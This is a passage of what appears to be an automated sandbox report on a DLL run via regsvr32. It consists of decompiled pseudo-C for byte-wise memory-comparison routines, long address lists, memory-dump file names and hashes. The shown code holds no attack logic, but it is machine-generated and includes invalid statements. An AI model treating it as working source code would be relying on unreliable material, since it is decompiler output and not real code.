											goto L73;
										}
										_t296 = (0 | _t299 > 0x00000000) + (0 | _t299 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L71;
									}
									_t306 = ( *(_t183 - 9) & 0x000000ff) - ( *(_t187 - 9) & 0x000000ff);
									if(_t306 == 0) {
										L60:
										_t308 = ( *(_t183 - 8) & 0x000000ff) - ( *(_t187 - 8) & 0x000000ff);
										if(_t308 == 0) {
											L62:
											_t310 = ( *(_t183 - 7) & 0x000000ff) - ( *(_t187 - 7) & 0x000000ff);
											if(_t310 == 0) {
												L64:
												_t296 = ( *(_t183 - 6) & 0x000000ff) - ( *(_t187 - 6) & 0x000000ff);
												if(_t296 != 0) {
													_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
												}
												goto L67;
											}
											_t296 = (0 | _t310 > 0x00000000) + (0 | _t310 > 0x00000000) - 1;
											if(_t296 != 0) {
												goto L1;
											}
											goto L64;
										}
										_t296 = (0 | _t308 > 0x00000000) + (0 | _t308 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L62;
									}
									_t296 = (0 | _t306 > 0x00000000) + (0 | _t306 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L60;
								}
								_t313 = (_t196 & 0x000000ff) - ( *(_t187 - 0xd) & 0x000000ff);
								if(_t313 == 0) {
									L49:
									_t315 = ( *(_t183 - 0xc) & 0x000000ff) - ( *(_t187 - 0xc) & 0x000000ff);
									if(_t315 == 0) {
										L51:
										_t317 = ( *(_t183 - 0xb) & 0x000000ff) - ( *(_t187 - 0xb) & 0x000000ff);
										if(_t317 == 0) {
											L53:
											_t296 = ( *(_t183 - 0xa) & 0x000000ff) - ( *(_t187 - 0xa) & 0x000000ff);
											if(_t296 != 0) {
												_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
											}
											goto L56;
										}
										_t296 = (0 | _t317 > 0x00000000) + (0 | _t317 > 0x00000000) - 1;
										if(_t296 != 0) {
											goto L1;
										}
										goto L53;
									}
									_t296 = (0 | _t315 > 0x00000000) + (0 | _t315 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L51;
								}
								_t296 = (0 | _t313 > 0x00000000) + (0 | _t313 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L49;
							}
							_t320 = (_t195 & 0x000000ff) - ( *(_t187 - 0x11) & 0x000000ff);
							if(_t320 == 0) {
								L38:
								_t322 = ( *(_t183 - 0x10) & 0x000000ff) - ( *(_t187 - 0x10) & 0x000000ff);
								if(_t322 == 0) {
									L40:
									_t324 = ( *(_t183 - 0xf) & 0x000000ff) - ( *(_t187 - 0xf) & 0x000000ff);
									if(_t324 == 0) {
										L42:
										_t296 = ( *(_t183 - 0xe) & 0x000000ff) - ( *(_t187 - 0xe) & 0x000000ff);
										if(_t296 != 0) {
											_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
										}
										goto L45;
									}
									_t296 = (0 | _t324 > 0x00000000) + (0 | _t324 > 0x00000000) - 1;
									if(_t296 != 0) {
										goto L1;
									}
									goto L42;
								}
								_t296 = (0 | _t322 > 0x00000000) + (0 | _t322 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L40;
							}
							_t296 = (0 | _t320 > 0x00000000) + (0 | _t320 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L38;
						}
						_t327 = (_t194 & 0x000000ff) - ( *(_t187 - 0x15) & 0x000000ff);
						if(_t327 == 0) {
							L27:
							_t329 = ( *(_t183 - 0x14) & 0x000000ff) - ( *(_t187 - 0x14) & 0x000000ff);
							if(_t329 == 0) {
								L29:
								_t331 = ( *(_t183 - 0x13) & 0x000000ff) - ( *(_t187 - 0x13) & 0x000000ff);
								if(_t331 == 0) {
									L31:
									_t296 = ( *(_t183 - 0x12) & 0x000000ff) - ( *(_t187 - 0x12) & 0x000000ff);
									if(_t296 != 0) {
										_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
									}
									goto L34;
								}
								_t296 = (0 | _t331 > 0x00000000) + (0 | _t331 > 0x00000000) - 1;
								if(_t296 != 0) {
									goto L1;
								}
								goto L31;
							}
							_t296 = (0 | _t329 > 0x00000000) + (0 | _t329 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L29;
						}
						_t296 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
						if(_t296 != 0) {
							goto L1;
						}
						goto L27;
					}
					_t334 = (_t193 & 0x000000ff) - ( *(_t187 - 0x19) & 0x000000ff);
					if(_t334 == 0) {
						L16:
						_t336 = ( *(_t183 - 0x18) & 0x000000ff) - ( *(_t187 - 0x18) & 0x000000ff);
						if(_t336 == 0) {
							L18:
							_t338 = ( *(_t183 - 0x17) & 0x000000ff) - ( *(_t187 - 0x17) & 0x000000ff);
							if(_t338 == 0) {
								L20:
								_t296 = ( *(_t183 - 0x16) & 0x000000ff) - ( *(_t187 - 0x16) & 0x000000ff);
								if(_t296 != 0) {
									_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
								}
								goto L23;
							}
							_t296 = (0 | _t338 > 0x00000000) + (0 | _t338 > 0x00000000) - 1;
							if(_t296 != 0) {
								goto L1;
							}
							goto L20;
						}
						_t296 = (0 | _t336 > 0x00000000) + (0 | _t336 > 0x00000000) - 1;
						if(_t296 != 0) {
							goto L1;
						}
						goto L18;
					}
					_t296 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
					if(_t296 != 0) {
						goto L1;
					}
					goto L16;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1d) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
					if(__esi == 0) {
						L5:
						__esi =  *(__eax - 0x1c) & 0x000000ff;
						__edx =  *(__ecx - 0x1c) & 0x000000ff;
						__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
						if(__esi == 0) {
							L7:
							__esi =  *(__eax - 0x1b) & 0x000000ff;
							__edx =  *(__ecx - 0x1b) & 0x000000ff;
							__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
							if(__esi == 0) {
								L9:
								__esi =  *(__eax - 0x1a) & 0x000000ff;
								__edx =  *(__ecx - 0x1a) & 0x000000ff;
								__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L12;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L9;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L7;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L5;
				}
				L1:
				_t184 = _t296;
				goto L2;
			}






























                                                                                                            0x10021938
                                                                                                            0x10021938
                                                                                                            0x1002193e
                                                                                                            0x100219bd
                                                                                                            0x100219bf
                                                                                                            0x100219c1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100219c7
                                                                                                            0x100219cd
                                                                                                            0x10021a4c
                                                                                                            0x10021a4e
                                                                                                            0x10021a50
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021a56
                                                                                                            0x10021a5c
                                                                                                            0x10021adb
                                                                                                            0x10021add
                                                                                                            0x10021adf
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021ae5
                                                                                                            0x10021aeb
                                                                                                            0x10021b6a
                                                                                                            0x10021b6c
                                                                                                            0x10021b6e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021b74
                                                                                                            0x10021b7a
                                                                                                            0x10021bf9
                                                                                                            0x10021bfb
                                                                                                            0x10021bfd
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021c09
                                                                                                            0x10021c89
                                                                                                            0x10021c8b
                                                                                                            0x10021c8d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021c93
                                                                                                            0x10021c99
                                                                                                            0x10021d18
                                                                                                            0x10021d1a
                                                                                                            0x10021d1c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021d2a
                                                                                                            0x10021d2c
                                                                                                            0x10021d3d
                                                                                                            0x10021d3d
                                                                                                            0x10021932
                                                                                                            0x1002268e
                                                                                                            0x1002268e
                                                                                                            0x10021ca2
                                                                                                            0x10021ca4
                                                                                                            0x10021cbb
                                                                                                            0x10021cc3
                                                                                                            0x10021cc5
                                                                                                            0x10021cdc
                                                                                                            0x10021ce4
                                                                                                            0x10021ce6
                                                                                                            0x10021cfd
                                                                                                            0x10021d05
                                                                                                            0x10021d07
                                                                                                            0x10021d14
                                                                                                            0x10021d14
                                                                                                            0x00000000
                                                                                                            0x10021d07
                                                                                                            0x10021cf3
                                                                                                            0x10021cf7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021cf7
                                                                                                            0x10021cd2
                                                                                                            0x10021cd6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021cd6
                                                                                                            0x10021cb1
                                                                                                            0x10021cb5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021cb5
                                                                                                            0x10021c13
                                                                                                            0x10021c15
                                                                                                            0x10021c2c
                                                                                                            0x10021c34
                                                                                                            0x10021c36
                                                                                                            0x10021c4d
                                                                                                            0x10021c55
                                                                                                            0x10021c57
                                                                                                            0x10021c6e
                                                                                                            0x10021c76
                                                                                                            0x10021c78
                                                                                                            0x10021c85
                                                                                                            0x10021c85
                                                                                                            0x00000000
                                                                                                            0x10021c78
                                                                                                            0x10021c64
                                                                                                            0x10021c68
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021c68
                                                                                                            0x10021c43
                                                                                                            0x10021c47
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021c47
                                                                                                            0x10021c22
                                                                                                            0x10021c26
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021c26
                                                                                                            0x10021b83
                                                                                                            0x10021b85
                                                                                                            0x10021b9c
                                                                                                            0x10021ba4
                                                                                                            0x10021ba6
                                                                                                            0x10021bbd
                                                                                                            0x10021bc5
                                                                                                            0x10021bc7
                                                                                                            0x10021bde
                                                                                                            0x10021be6
                                                                                                            0x10021be8
                                                                                                            0x10021bf5
                                                                                                            0x10021bf5
                                                                                                            0x00000000
                                                                                                            0x10021be8
                                                                                                            0x10021bd4
                                                                                                            0x10021bd8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021bd8
                                                                                                            0x10021bb3
                                                                                                            0x10021bb7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021bb7
                                                                                                            0x10021b92
                                                                                                            0x10021b96
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021b96
                                                                                                            0x10021af4
                                                                                                            0x10021af6
                                                                                                            0x10021b0d
                                                                                                            0x10021b15
                                                                                                            0x10021b17
                                                                                                            0x10021b2e
                                                                                                            0x10021b36
                                                                                                            0x10021b38
                                                                                                            0x10021b4f
                                                                                                            0x10021b57
                                                                                                            0x10021b59
                                                                                                            0x10021b66
                                                                                                            0x10021b66
                                                                                                            0x00000000
                                                                                                            0x10021b59
                                                                                                            0x10021b45
                                                                                                            0x10021b49
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021b49
                                                                                                            0x10021b24
                                                                                                            0x10021b28
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021b28
                                                                                                            0x10021b03
                                                                                                            0x10021b07
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021b07
                                                                                                            0x10021a65
                                                                                                            0x10021a67
                                                                                                            0x10021a7e
                                                                                                            0x10021a86
                                                                                                            0x10021a88
                                                                                                            0x10021a9f
                                                                                                            0x10021aa7
                                                                                                            0x10021aa9
                                                                                                            0x10021ac0
                                                                                                            0x10021ac8
                                                                                                            0x10021aca
                                                                                                            0x10021ad7
                                                                                                            0x10021ad7
                                                                                                            0x00000000
                                                                                                            0x10021aca
                                                                                                            0x10021ab6
                                                                                                            0x10021aba
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021aba
                                                                                                            0x10021a95
                                                                                                            0x10021a99
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021a99
                                                                                                            0x10021a74
                                                                                                            0x10021a78
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021a78
                                                                                                            0x100219d6
                                                                                                            0x100219d8
                                                                                                            0x100219ef
                                                                                                            0x100219f7
                                                                                                            0x100219f9
                                                                                                            0x10021a10
                                                                                                            0x10021a18
                                                                                                            0x10021a1a
                                                                                                            0x10021a31
                                                                                                            0x10021a39
                                                                                                            0x10021a3b
                                                                                                            0x10021a48
                                                                                                            0x10021a48
                                                                                                            0x00000000
                                                                                                            0x10021a3b
                                                                                                            0x10021a27
                                                                                                            0x10021a2b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021a2b
                                                                                                            0x10021a06
                                                                                                            0x10021a0a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021a0a
                                                                                                            0x100219e5
                                                                                                            0x100219e9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021940
                                                                                                            0x10021940
                                                                                                            0x10021943
                                                                                                            0x10021947
                                                                                                            0x10021949
                                                                                                            0x10021960
                                                                                                            0x10021960
                                                                                                            0x10021964
                                                                                                            0x10021968
                                                                                                            0x1002196a
                                                                                                            0x10021981
                                                                                                            0x10021981
                                                                                                            0x10021985
                                                                                                            0x10021989
                                                                                                            0x1002198b
                                                                                                            0x100219a2
                                                                                                            0x100219a2
                                                                                                            0x100219a6
                                                                                                            0x100219aa
                                                                                                            0x100219ac
                                                                                                            0x100219b2
                                                                                                            0x100219b5
                                                                                                            0x100219b9
                                                                                                            0x100219b9
                                                                                                            0x00000000
                                                                                                            0x100219ac
                                                                                                            0x10021991
                                                                                                            0x10021994
                                                                                                            0x10021998
                                                                                                            0x1002199c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002199c
                                                                                                            0x10021970
                                                                                                            0x10021973
                                                                                                            0x10021977
                                                                                                            0x1002197b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002197b
                                                                                                            0x1002194f
                                                                                                            0x10021952
                                                                                                            0x10021956
                                                                                                            0x1002195a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002195a
                                                                                                            0x1002155d
                                                                                                            0x1002155d
                                                                                                            0x00000000

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.472078173.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.472074699.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472102017.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472113100.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472188714.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472194833.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472233138.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472302242.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472308618.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.472318366.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                            • Instruction ID: 6af215656b7b663fef1c66103eb4b28a24fc01d7554443f013e046fd6066f34d
                                                                                                            • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                            • Instruction Fuzzy Hash: E2C1A47BC0B9F3868776C12D606416EEEA29FE15913ABC3E1CCE43F28992279D0085D0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10021564 Relevance: .4, Instructions: 351COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10021564(void* __eax, void* __ecx) {
				void* _t177;
				signed int _t178;
				void* _t181;
				signed char _t187;
				signed char _t188;
				signed char _t189;
				signed char _t191;
				signed char _t192;
				signed int _t198;
				signed int _t284;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t321;
				void* _t323;
				void* _t325;

				_t181 = __ecx;
				_t177 = __eax;
				if( *((intOrPtr*)(__eax - 0x1c)) ==  *((intOrPtr*)(__ecx - 0x1c))) {
					_t284 = 0;
					L11:
					if(_t284 != 0) {
						goto L1;
					}
					_t187 =  *(_t177 - 0x18);
					if(_t187 ==  *(_t181 - 0x18)) {
						_t284 = 0;
						L22:
						if(_t284 != 0) {
							goto L1;
						}
						_t188 =  *(_t177 - 0x14);
						if(_t188 ==  *(_t181 - 0x14)) {
							_t284 = 0;
							L33:
							if(_t284 != 0) {
								goto L1;
							}
							_t189 =  *(_t177 - 0x10);
							if(_t189 ==  *(_t181 - 0x10)) {
								_t284 = 0;
								L44:
								if(_t284 != 0) {
									goto L1;
								}
								if( *(_t177 - 0xc) ==  *(_t181 - 0xc)) {
									_t284 = 0;
									L55:
									if(_t284 != 0) {
										goto L1;
									}
									_t191 =  *(_t177 - 8);
									if(_t191 ==  *(_t181 - 8)) {
										_t284 = 0;
										L66:
										if(_t284 != 0) {
											goto L1;
										}
										_t192 =  *(_t177 - 4);
										if(_t192 ==  *(_t181 - 4)) {
											_t178 = 0;
											L78:
											if(_t178 == 0) {
												_t178 = 0;
											}
											L80:
											return _t178;
										}
										_t287 = (_t192 & 0x000000ff) - ( *(_t181 - 4) & 0x000000ff);
										if(_t287 == 0) {
											L70:
											_t289 = ( *(_t177 - 3) & 0x000000ff) - ( *(_t181 - 3) & 0x000000ff);
											if(_t289 == 0) {
												L72:
												_t291 = ( *(_t177 - 2) & 0x000000ff) - ( *(_t181 - 2) & 0x000000ff);
												if(_t291 == 0) {
													L75:
													_t178 = ( *(_t177 - 1) & 0x000000ff) - ( *(_t181 - 1) & 0x000000ff);
													if(_t178 != 0) {
														_t178 = (0 | _t178 > 0x00000000) + (0 | _t178 > 0x00000000) - 1;
													}
													goto L78;
												}
												_t198 = (0 | _t291 > 0x00000000) + (0 | _t291 > 0x00000000) - 1;
												if(_t198 == 0) {
													goto L75;
												}
												L74:
												_t178 = _t198;
												goto L78;
											}
											_t198 = (0 | _t289 > 0x00000000) + (0 | _t289 > 0x00000000) - 1;
											if(_t198 != 0) {
												goto L74;
											}
											goto L72;
										}
										_t198 = (0 | _t287 > 0x00000000) + (0 | _t287 > 0x00000000) - 1;
										if(_t198 != 0) {
											goto L74;
										}
										goto L70;
									}
									_t293 = (_t191 & 0x000000ff) - ( *(_t181 - 8) & 0x000000ff);
									if(_t293 == 0) {
										L59:
										_t295 = ( *(_t177 - 7) & 0x000000ff) - ( *(_t181 - 7) & 0x000000ff);
										if(_t295 == 0) {
											L61:
											_t297 = ( *(_t177 - 6) & 0x000000ff) - ( *(_t181 - 6) & 0x000000ff);
											if(_t297 == 0) {
												L63:
												_t284 = ( *(_t177 - 5) & 0x000000ff) - ( *(_t181 - 5) & 0x000000ff);
												if(_t284 != 0) {
													_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
												}
												goto L66;
											}
											_t284 = (0 | _t297 > 0x00000000) + (0 | _t297 > 0x00000000) - 1;
											if(_t284 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t284 = (0 | _t295 > 0x00000000) + (0 | _t295 > 0x00000000) - 1;
										if(_t284 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t284 = (0 | _t293 > 0x00000000) + (0 | _t293 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t300 = ( *(_t177 - 0xc) & 0x000000ff) - ( *(_t181 - 0xc) & 0x000000ff);
								if(_t300 == 0) {
									L48:
									_t302 = ( *(_t177 - 0xb) & 0x000000ff) - ( *(_t181 - 0xb) & 0x000000ff);
									if(_t302 == 0) {
										L50:
										_t304 = ( *(_t177 - 0xa) & 0x000000ff) - ( *(_t181 - 0xa) & 0x000000ff);
										if(_t304 == 0) {
											L52:
											_t284 = ( *(_t177 - 9) & 0x000000ff) - ( *(_t181 - 9) & 0x000000ff);
											if(_t284 != 0) {
												_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
											}
											goto L55;
										}
										_t284 = (0 | _t304 > 0x00000000) + (0 | _t304 > 0x00000000) - 1;
										if(_t284 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t284 = (0 | _t302 > 0x00000000) + (0 | _t302 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t284 = (0 | _t300 > 0x00000000) + (0 | _t300 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t307 = (_t189 & 0x000000ff) - ( *(_t181 - 0x10) & 0x000000ff);
							if(_t307 == 0) {
								L37:
								_t309 = ( *(_t177 - 0xf) & 0x000000ff) - ( *(_t181 - 0xf) & 0x000000ff);
								if(_t309 == 0) {
									L39:
									_t311 = ( *(_t177 - 0xe) & 0x000000ff) - ( *(_t181 - 0xe) & 0x000000ff);
									if(_t311 == 0) {
										L41:
										_t284 = ( *(_t177 - 0xd) & 0x000000ff) - ( *(_t181 - 0xd) & 0x000000ff);
										if(_t284 != 0) {
											_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
										}
										goto L44;
									}
									_t284 = (0 | _t311 > 0x00000000) + (0 | _t311 > 0x00000000) - 1;
									if(_t284 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t284 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t284 = (0 | _t307 > 0x00000000) + (0 | _t307 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t314 = (_t188 & 0x000000ff) - ( *(_t181 - 0x14) & 0x000000ff);
						if(_t314 == 0) {
							L26:
							_t316 = ( *(_t177 - 0x13) & 0x000000ff) - ( *(_t181 - 0x13) & 0x000000ff);
							if(_t316 == 0) {
								L28:
								_t318 = ( *(_t177 - 0x12) & 0x000000ff) - ( *(_t181 - 0x12) & 0x000000ff);
								if(_t318 == 0) {
									L30:
									_t284 = ( *(_t177 - 0x11) & 0x000000ff) - ( *(_t181 - 0x11) & 0x000000ff);
									if(_t284 != 0) {
										_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
									}
									goto L33;
								}
								_t284 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
								if(_t284 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t284 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t284 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
						if(_t284 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t321 = (_t187 & 0x000000ff) - ( *(_t181 - 0x18) & 0x000000ff);
					if(_t321 == 0) {
						L15:
						_t323 = ( *(_t177 - 0x17) & 0x000000ff) - ( *(_t181 - 0x17) & 0x000000ff);
						if(_t323 == 0) {
							L17:
							_t325 = ( *(_t177 - 0x16) & 0x000000ff) - ( *(_t181 - 0x16) & 0x000000ff);
							if(_t325 == 0) {
								L19:
								_t284 = ( *(_t177 - 0x15) & 0x000000ff) - ( *(_t181 - 0x15) & 0x000000ff);
								if(_t284 != 0) {
									_t284 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
								}
								goto L22;
							}
							_t284 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
							if(_t284 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t284 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
						if(_t284 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t284 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
					if(_t284 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__esi = __dl & 0x000000ff;
					__edx =  *(__ecx - 0x1c) & 0x000000ff;
					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
					if(__esi == 0) {
						L4:
						__esi =  *(__eax - 0x1b) & 0x000000ff;
						__edx =  *(__ecx - 0x1b) & 0x000000ff;
						__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
						if(__esi == 0) {
							L6:
							__esi =  *(__eax - 0x1a) & 0x000000ff;
							__edx =  *(__ecx - 0x1a) & 0x000000ff;
							__esi = ( *(__eax - 0x1a) & 0x000000ff) - ( *(__ecx - 0x1a) & 0x000000ff);
							if(__esi == 0) {
								L8:
								__esi =  *(__eax - 0x19) & 0x000000ff;
								__edx =  *(__ecx - 0x19) & 0x000000ff;
								__esi = ( *(__eax - 0x19) & 0x000000ff) - ( *(__ecx - 0x19) & 0x000000ff);
								if(__esi != 0) {
									0 = 0 | __esi > 0x00000000;
									__edx = (__esi > 0) + (__esi > 0) - 1;
									__esi = (__esi > 0) + (__esi > 0) - 1;
								}
								goto L11;
							}
							0 = 0 | __esi > 0x00000000;
							__edx = (__esi > 0) + (__esi > 0) - 1;
							__esi = __edx;
							if(__edx != 0) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __esi > 0x00000000;
						__edx = (__esi > 0) + (__esi > 0) - 1;
						__esi = __edx;
						if(__edx != 0) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __esi > 0x00000000;
					__edx = (__esi > 0) + (__esi > 0) - 1;
					__esi = __edx;
					if(__edx != 0) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t178 = _t284;
				goto L80;
			}































                                                                                                            0x10021564
                                                                                                            0x10021564
                                                                                                            0x1002156a
                                                                                                            0x100215dd
                                                                                                            0x100215df
                                                                                                            0x100215e1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100215e7
                                                                                                            0x100215ed
                                                                                                            0x1002166c
                                                                                                            0x1002166e
                                                                                                            0x10021670
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021676
                                                                                                            0x1002167c
                                                                                                            0x100216fb
                                                                                                            0x100216fd
                                                                                                            0x100216ff
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021705
                                                                                                            0x1002170b
                                                                                                            0x1002178a
                                                                                                            0x1002178c
                                                                                                            0x1002178e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1002179a
                                                                                                            0x1002181a
                                                                                                            0x1002181c
                                                                                                            0x1002181e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10021824
                                                                                                            0x1002182a
                                                                                                            0x100218a9
                                                                                                            0x100218ab
                                                                                                            0x100218ad
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100218b3
                                                                                                            0x100218b9
                                                                                                            0x1002192a
                                                                                                            0x1002192c
                                                                                                            0x1002192e
                                                                                                            0x10021930
                                                                                                            0x10021930
                                                                                                            0x10021932
                                                                                                            0x1002268e
                                                                                                            0x1002268e
                                                                                                            0x100218c2
                                                                                                            0x100218c4
                                                                                                            0x100218d5
                                                                                                            0x100218dd
                                                                                                            0x100218df
                                                                                                            0x100218f0
                                                                                                            0x100218f8
